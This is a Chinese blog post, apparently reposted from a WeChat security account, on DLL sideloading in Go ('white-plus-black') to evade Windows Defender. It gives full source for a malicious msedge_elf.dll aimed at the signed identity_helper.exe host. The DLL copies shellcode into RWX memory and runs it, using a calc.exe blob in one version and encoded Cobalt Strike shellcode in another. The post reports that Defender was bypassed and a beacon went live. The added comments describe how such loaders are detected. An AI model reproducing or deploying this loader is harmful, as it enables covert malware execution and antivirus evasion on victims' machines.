2.mingw64
下载地址
https://sourceforge.net/projects/mingw-w64/files/
注意: sjlj 版本支持32位和64位编译,seh 版本仅支持64位程序编译; posix 版本封装一层,并没有直接调用windows API,而 win32 版本直接调用了windows API,性能更好, 对于跨平台编译的话我建议选择 posix-sjlj 版本,这样可以很方便编译dll和so文件,缺点是文件稍微大一些,编译速度慢一些. 我这里选择的是(x86_64-posix-sjlj), 下载之后把解压目录下的bin加入到环境变量中
设置go
set CGO_ENABLED=1
main.go
package main
import "C"
// Add returns the sum of a and b. The //export directive below makes cgo
// emit it as an exported symbol when the package is built with
// -buildmode=c-shared, so a host process can resolve it by name.
//export Add
func Add(a, b int) int {
	total := a
	total += b
	return total
}
// main exists only because a -buildmode=c-shared build still requires
// package main with a main function (see the note on this page); it is
// deliberately left empty.
func main() {
}
//export Add: 定义导出函数
必须要有main函数
编译dll命令
go build -ldflags="-w -s" -buildmode=c-shared -o dll1.dll main.go
编写exe测试
main.go
package main
import (
	"fmt"
	"log"
	"os"
	"path/filepath"
	"syscall"
)
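// main loads the DLL built in the previous step and calls its exported Add.
//
// The DLL is resolved by an absolute path next to this executable instead of
// the bare name "dll1.dll": syscall.LoadDLL hands a bare name to the normal
// Windows DLL search order, so whichever same-named library appears first in
// that order is the one that gets loaded — the same search-order behaviour
// the rest of this page relies on against a signed host. Load and lookup
// failures are reported with their cause rather than panicking through the
// Must* helpers.
func main() {
	exe, err := os.Executable()
	if err != nil {
		log.Fatalf("locating executable: %v", err)
	}
	dllPath := filepath.Join(filepath.Dir(exe), "dll1.dll")

	handle, err := syscall.LoadDLL(dllPath)
	if err != nil {
		log.Fatalf("loading %q: %v", dllPath, err)
	}
	defer handle.Release()

	add, err := handle.FindProc("Add")
	if err != nil {
		log.Fatalf("finding Add in %q: %v", dllPath, err)
	}

	// Proc.Call documents its error result as always non-nil (it mirrors
	// GetLastError), and only r1 carries the return value, so the second
	// and third results are intentionally dropped.
	res, _, _ := add.Call(2, 3)
	fmt.Println(res)
}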
成功调用dll文件中的导出函数
使用 identity_helper.exe 白程序测试
main.go
package main
import "C"
import (
"golang.org/x/sys/windows"
"syscall"
"unsafe"
)
// GetInstallDetailsPayload is the export the host process is expected to
// call once it has loaded this DLL (the name is presumably chosen to match
// an import of the sideloaded host binary — the host's import table is not
// shown on this page). It copies an embedded byte blob into a newly
// allocated executable region, transfers control to it, and returns 0.
//
// From a detection standpoint the three calls below form the classic
// in-memory execution chain: VirtualAlloc with MEM_COMMIT|MEM_RESERVE
// (0x1000|0x2000) and PAGE_EXECUTE_READWRITE (0x40), a copy into that RWX
// region, and an indirect call to its base address. A private RWX region
// that is written and then executed from a DLL loaded out of the host's own
// directory is exactly what memory scanners and API/ETW-based sensors key
// on. The ignored VirtualAlloc result is also a robustness gap: a zero addr
// would make the copy and the call fault.
//export GetInstallDetailsPayload
func GetInstallDetailsPayload() int {
	handle := windows.NewLazySystemDLL("kernel32.dll")
	VirtualAlloc := handle.NewProc("VirtualAlloc")
	RtlMoveMemory := handle.NewProc("RtlMoveMemory")
	// Payload bytes: shellcode that launches calc.exe (the ASCII tail of the
	// literal spells "calc.exe\0"). A well-known blob like this is a strong
	// static signature on its own.
	sc := []byte{0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00}
	// Reserve+commit an RWX buffer sized to the payload; r1 is the base
	// address and is used unchecked.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)
	// Copy the payload into the executable region.
	RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	// SyscallN with no arguments is simply an indirect call to addr.
	syscall.SyscallN(addr)
	return 0
}
// SignalInitializeCrashReporting is a no-op export that always reports 0.
// It presumably exists so that every symbol the host imports from this DLL
// resolves — the host's import list is not shown on this page.
//export SignalInitializeCrashReporting
func SignalInitializeCrashReporting() int {
	const ok = 0
	return ok
}
// main is present only because a -buildmode=c-shared build requires
// package main with a main function; it is deliberately empty.
func main() {
}
编译dll命令
go build -ldflags="-w -s" -buildmode=c-shared -o msedge_elf.dll main.go
替换成cs的shellcode, cs的无阶段的shellcode使用sgn进行处理
package main
import "C"
import (
"golang.org/x/sys/windows"
"syscall"
"unsafe"
)
// GetInstallDetailsPayload is the export the host process is expected to
// call after loading this DLL. Apart from the payload bytes it is the same
// loader as the calc.exe variant earlier on this page: allocate an RWX
// region (MEM_COMMIT|MEM_RESERVE = 0x1000|0x2000, PAGE_EXECUTE_READWRITE =
// 0x40), copy the blob in, and call into it. That write-then-execute chain
// on a private RWX allocation is the behaviour memory scanners and
// API/ETW-based sensors alert on regardless of how the bytes themselves
// were encoded. The VirtualAlloc result is used unchecked.
//export GetInstallDetailsPayload
func GetInstallDetailsPayload() int {
	sc := []byte{0xe8,0x2b,0x00...} // stageless CS shellcode after sgn processing (bytes elided on the page)
	handle := windows.NewLazySystemDLL("kernel32.dll")
	VirtualAlloc := handle.NewProc("VirtualAlloc")
	RtlMoveMemory := handle.NewProc("RtlMoveMemory")
	// Reserve+commit an RWX buffer sized to the payload; r1 is the base address.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)
	// Copy the payload into the executable region.
	RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	// SyscallN with no arguments is simply an indirect call to addr.
	syscall.SyscallN(addr)
	return 0
}
// SignalInitializeCrashReporting is a no-op export that always reports 0.
// It presumably exists so that every symbol the host imports from this DLL
// resolves — the host's import list is not shown on this page.
//export SignalInitializeCrashReporting
func SignalInitializeCrashReporting() int {
	const ok = 0
	return ok
}
// main is present only because a -buildmode=c-shared build requires
// package main with a main function; it is deliberately empty.
func main() {
}
编译
go build -ldflags="-w -s" -buildmode=c-shared -o msedge_elf.dll main.go
使用defender查杀测试, 免杀defender
上线cs
执行系统命令, 动态免杀defender
成功免杀defender
原文始发于微信公众号(Sec探索者):【免杀】go语言实现白加黑免杀defender
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。